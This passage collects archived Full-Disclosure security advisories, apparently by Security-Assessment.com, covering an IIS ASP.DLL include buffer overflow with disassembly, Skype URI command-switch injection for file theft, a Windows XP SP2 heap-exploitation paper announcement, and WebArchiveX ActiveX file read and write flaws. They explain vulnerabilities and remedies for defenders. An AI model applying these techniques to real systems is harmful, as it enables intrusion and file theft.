vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com RD team are globally recognised through their release of whitepapers and presentations related to new security research. Security-Assessment.com is an Endorsed Commonwealth Government of Australia supplier and sits on the Australian Government Attorney-General's Department Critical Infrastructure Project panel. We are certified by both Visa and MasterCard under their Payment Card Industry Data Security Standard Programs. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ASP.DLL Include File Buffer Overflow
= ASP.DLL Include File Buffer Overflow = = MS Bulletin posted: = http://www.microsoft.com/technet/security/Bulletin/MS06-034.mspx = = Affected Software: =IIS 5.0 =IIS 5.1 =IIS 6.0 = = Public disclosure on July 19, 2006 == Overview == A buffer overflow exists in ASP.DLL that can be exploited by creating a .asp file containing a parameter for the include SSI command. !-- #include file=long buffer --OVERFLOWDATA The include function in ASP.DLL, checks if the parameter is longer than 260 bytes. If it is then an error is caused, but before causing the error a miscalculated copy is done. mov edi, [ebp+var_228] ; load length of parameter cmp edi, 104h; check if larger than 260 bytes jbe short loc_ mov esi, [ebp+var_22C] ; load address of parameter lea eax, [edi+esi-104h] ; load eax with the address of the last ; 260 bytes of the parameter ; (length of string+source of string)- 104h lea edx, [ebp+var_211] ; load edx with address on stack sub edx, eax ; mov cl, [eax]; \ mov [edx+eax], cl; do the copy inc eax ; and overflow the stack testcl, cl ; / jnz short loc_7096D1F3 ; Funnily enough, the solution was to remove this copy as the resulting data was never actually used. == Exploitation == Exploitation requires the ability to upload or somehow create a file with a .asp extension in a folder that will allow .asp processing. Since ASP.DLL usually runs under the IWAM_ account, there is no privilege escalation through this vulnerability. It is however possible to bypass any security restrictions enforced by ASP. It also allows for the execution of APIS that have no ASP equivalent. == Solutions == - Install the vendor supplied patch. == Credit == Discovered and advised to Microsoft February, 2006 by Brett Moore of Security-Assessment.com Same Bug Different App http://www.security-assessment.com/Presentations/SBDA_Ruxcon_2005.ppt In memory of; http://www.nsfocus.com/english/homepage/research/0305.htm and http://www.eeye.com/html/research/advisories/AD20001003.html == About Security-Assessment.com == Security-Assessment.com is a leader in intrusion testing and security code review, and leads the world with SA-ISO, online ISO17799 compliance management solution. Security-Assessment.com is committed to security research and development, and its team have previously identified a number of vulnerabilities in public and private software vendors products. -- This message has been scanned for viruses and dangerous content by Bizo Email Filter, and is believed to be clean. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Skype - URI Handler Command Switch Parsing
= Skype - URI Handler Command Switch Parsing = = Vendor Website: = http://www.skype.com = = Affected Version: = Skype for Windows: = All releases prior to and including 2.0.*.104 = Release 2.5.*.0 to and including 2.5.*.78 = = Public disclosure on May 22, 2006 == Overview == During the typical installation of the Windows Skype client, several URI handlers are installed. This allows for easy access to the Skype client through various URI types. Due to a flaw in the handling of one of these types, it is possible to include additional command line switches to be passed to the Skype client. One of these switches will initiate a file transfer, sending the specified file to an arbitrary Skype user. == Exploitation == Exploitation occurs when the victim opens the exploit URI in Internet Explorer. This requires the victim to visit a website under the attackers control, or to be convinced into opening a malicious HTML page. Clicking on a link is not required, as this action can be automated in various ways using scripting language. For the attack to be successful the attacker must know the location of the requested file on the victims machine. One common target file would be the victims Skype configuration file. For the file transfer to succeed the attacker must have authorised the victim, which can be done by adding the victim to the attackers contact list. This does not require any authorisation from the victim Skype user. Other Skype command line switches could also be exploited to manipulate or obtain the Skype users credentials, under similar situations. == Solutions == - Install the vendor supplied upgrade http://www.skype.com/security/skype-sb-2006-001.html == Credit == Discovered and advised to Skype Limited May, 2006 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is New Zealand's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout Australasia. Our clients range from small businesses to some of the largest globally recognized companies. Security-Assessment.com has no vendor relationships and positions itself as the only independent security assurance provider in New Zealand. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] -Exploiting Freelist[0] On Windows XP Service Pack 2-
-Exploiting Freelist[0] On Windows XP Service Pack 2- Windows XP Service pack 2 introduced some new security measures in an attempt to prevent the use of overwritten heap headers to do arbitrary byte writing. This method of exploiting heap overflows, and the protection offered by service pack 2, is widely known and has been well documented in the past. What this paper will attempt to explain is how other functionality of the heap management code can be used to gain execution control after a chunk header has been overwritten. In particular this paper takes a look at exploiting freelist[0] overwrites. It can currently be downloaded from our website http://www.security-assessment.com/tech-1.htm Brett Moore Network Intrusion Specialist, CTO Security-Assessment.com CONFIDENTIALITY NOTICE: This message and any attachment(s) are confidential and proprietary. They may also be privileged or otherwise protected from disclosure. If you are not the intended recipient, advise the sender and delete this message and any attachment from your system. If you are not the intended recipient, you are not authorised to use or copy this message or attachment or disclose the contents to any other person. Views expressed are not necessarily endorsed by Security-Assessment.com Limited. Please note that this communication does not designate an information system for the purposes of the New Zealand Electronic Transactions Act 2002. e-mail protected and scanned by Bizo Email Filter - powered by Advascan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WebArchiveX - Unsafe Methods Vulnerability
= WebArchiveX - Unsafe Methods Vulnerability
=
= Vendor Website:
= http://http://www.csystems.co.il/webarchivex/index.aspx
=
= Affected Version:
=WebArchiveX.dll 5.5.0.76 Installed Prior To Sep 6th, 2005
=
= Public disclosure on September 07, 2005
== Overview ==
The WebArchiveX component gives developers the ability to include .MHT
archive creation in their software and is compatible with a wide range
of programming languages.
Prior to September 6th 2005, the activeX component would install and
mark itself 'safe for scripting'. The component offers various methods
that when instantiated by a malicious web site, can be used to read files
from, or write files to the local computer.
== Exploitation ==
The component has an extensive API that can be viewed online;
http://www.csystems.co.il/WebArchiveX/help/api.html
This advisory concentrates on the two following methods;
* MakeArchive- Build MHT web archive (single MHT file)
Boolean MakeArchive(
String htmlFile,
String userAgent,
String mhtFile
);
The MakeArchive method will accept a local path as the mhtFile
parameter, allowing a malicious web site to write a file to the local
drive. By writing to the startup folder, it is possible to create a
.mht that will be executed locally at startup.
* MakeArchiveStr - Build MHT web archive and returns it as a string
String MakeArchiveStr(
String htmlFile,
String userAgent
);
The MakeArchiveStr method will accept a local path as the htmlFile
parameter. After reading in the file, the contents will be returned
to the calling script. This allows a malicious website to read the
contents of any file accessible by the current user.
== Solutions ==
- The vendor has changed the default installation to remove the 'safe for
scripting' entry, but unfortunately has not changed the version number.
The download now includes a readme file that contains;
Why WebArchiveX is not safe for scripting?
--
If WebArchiveX was safe for scripting, then malicious websites
could use WebArchiveX in order to read/write files from/to your
local file system. Please contact [EMAIL PROTECTED] for
further details!
In order to make WebArchiveX safe for scripting you can import
the enclosed Registry file WebArchiveX_SafeForScripting.reg.
- To identify if this component is installed on your pc, search the
registry for WebArchiveX entries.
- If the entry is located, remove the 'safe for scripting' entry by
removing these keys;
\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}
\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}
- For additional help contact [EMAIL PROTECTED]
== Credit ==
Discovered and advised to cSystems August, 2005 by Brett Moore of
Security-Assessment.com
== About Security-Assessment.com ==
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.
e-mail protected and scanned by Bizo Email Filter - powered by Advascan
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
